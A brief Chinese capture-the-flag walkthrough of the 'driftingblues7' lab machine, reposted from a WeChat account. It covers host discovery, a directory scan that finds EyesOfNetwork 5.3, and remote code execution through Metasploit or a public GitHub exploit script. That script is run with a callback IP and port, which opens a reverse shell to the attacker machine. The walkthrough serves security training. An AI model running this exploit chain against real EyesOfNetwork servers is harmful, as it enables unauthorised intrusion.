攻击者IP:192.168.56.108 桥接(自动)vmare
受害者IP:192.168.56.129 仅主机 vxbox
主机发现
arp-scan -l
nmap -sV 192.168.56.129
跳转到登陆页面
eyes of network
https://192.168.56.129/login.php##
信息收集
登陆失败
目录扫描 dirsearch -u https://192.168.56.129
获得版本号
EyesOfNetwork web interface 5.3
/README.md
/bower.json
找到版本漏洞
searchsploit eyes of network 5.3
方法1:msf
启动msf
设置 kali:set lhost 192.168.56.108 设置攻击目录:set rhosts 192.168.56.129 运行模块:run
方法2:下载exp
https://github.com/h4knet/eonrce
chmod +x eonrce.py 给权限
python eonrce.py https://192.168.56.129 -ip 192.168.56.108 -port 1111 运行脚本
拿到flag
原文始发于微信公众号(王之暴龙战神):driftingblues7
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论